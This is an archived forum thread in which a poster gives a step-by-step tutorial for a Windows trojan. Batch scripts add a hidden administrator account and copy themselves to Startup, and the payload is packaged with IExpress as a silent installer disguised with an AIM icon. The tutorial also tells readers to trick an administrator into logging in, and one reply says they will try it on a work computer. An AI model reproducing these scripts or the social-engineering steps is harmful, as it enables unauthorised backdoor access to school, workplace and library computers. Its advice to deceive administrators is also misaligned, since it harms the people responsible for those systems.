PDA

View Full Version : The back door batch



teknicalissue
02-02-2008, 10:50 PM
before i continue i must state that i have no intensions of using my knowledge for any malicious intent AND this tutorial is for EDUCATIONAL PURPOSES ONLY!! meaning if you do it and get in trouble, don't blame it on me

ok many of you guys have restricted user access in school,work place, and even a very bad ******* cyber cafe/library. many of these restrictions are caused by the simple "restricted user" option and in many places, your user account is "customly" ******* by the group policy and such..now what we are about to do requires a bit of social engeneering and a simple bat/exe file that we are going to make. now lets start on our batch file.
(open up notepad by start->run->notepad)

lets start the batch


@echo off


for those of you who do not know what some of these commands mean..please look at my first batch file tut HERE (http://www.all-nettools.com/forum/showthread.php?t=6*0*)

now first we are going to add the new user which in this case, is going to be cybernin


@echo off
net user cybernin tico /add


this command will create the new username named "cyberin" with the password "tico". this command alone will not create give us administrator privliges so we must add ourselves as admins with this code


net localgroup administrators cybernin /add


now in total we should have:


@echo off
net user cybernin tico /add
net localgroup administrators cybernin /add

save it as "newuser.bat"

ok at the current moment if you run this batch file you will get the access denied 5 error code thing soooo lets make a "fake" virus. open up notepad
again and start it off.



@echo off
:start
call msg * "YOU HAVE BEEN HACKED!!! WE DETECT THAT YOUR RUNNING ON A RESTRICTED USER MACHINE, HAHAHA! THE ONLY WAY TO STOP THIS IS BY LOGING IN AS A USER WITH ADMIN PRIVLIGES AND REMOVE ME FROM THE REGISTRY..HA GOOD LUCK NEWBBZZZ"
GOTO start


now that we have this, lets save it as message.bat

so now we have newuser.bat and message.bat
lets make two batch files to start up both processes the way we want them to start. one of the batch files should have
save this as start*.bat


@echo off
start newuser.exe
copy "newuser.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"


and the other one should be named start2.bat with the following code



@echo off
start message.exe


now were going to make them exe's using the converter on the link provided above.

make newuser.bat, message.bat, start*.bat, and start2.bat in to exe's (each one an exe so the output is newuser.exe, message.exe, start*.exe, and start2.exe

now lets open up windows packager (start->run->iexpress)

now create a new self extraction then click next
select extract and install (the first choice Buzzo) then next
give it a random title
then no promt then next
no license..next
ah now we add our start*.exe, start2.exe,message.exe and newuser.exe in to this wonderful white box and click next
on the box that says install program select start*.exe then for the bottom select start2.exe
click next
select hidden then next
no message, next
now check hide process animation from user and click browse to save it and give it a name like above
no restart, next
don't save if you do then save i don't care, next
then create and your exe will be created.. NOW! look at the fugly icon..
use my icon changer and look for an AIM icon or something to make it beleive able, my icon changer is pretty self explanatory (and not..its really not mine) so i don't feel like getting into the icon changer since even a stupid one can do it. your .exe is now alive and kicking.

now we go to the target computer and make sure that person with the admin pass is around and launch the program we made..it should copy itself to startup and open the message boxes NOW to go tell your admin.."hey something up with the comp..it says i have to log in as admin or something.." they go up to the comp put in theyre information and as soon as they start, BAM you have your very own username =)

hope you liked this tut

thanks again to

myspace
syntax (gave me first codes for admin =))
m00nbat (his name really makes me want to talk to him for some reason..)
CPL.T tought me everything i know

Moonbat
02-03-2008, 11:44 AM
Another good tut for getting admin, but I'll have to rate this one lower because it involves some degree of social engineering (i.e. lying, tricking) to get the admin to login as administrator. So, 8/*0 for this one. But still, keep up the good work.

Which reminds me, I need to start writing some tuts...

teknicalissue
02-03-2008, 01:55 PM
thanks m00nbat, one more thing if you (not addressing to m00nbat specificly) don't feel comfortable about the whole social engeneering thing just leave it in the start up and return within a week lol sooner or later the must have loged in as admin;) i will now write another tut lol

jode
02-05-2008, 07:00 AM
you Good .. i Will try this in a computer work

teknicalissue
02-05-2008, 10:03 AM
let me know how it works out =)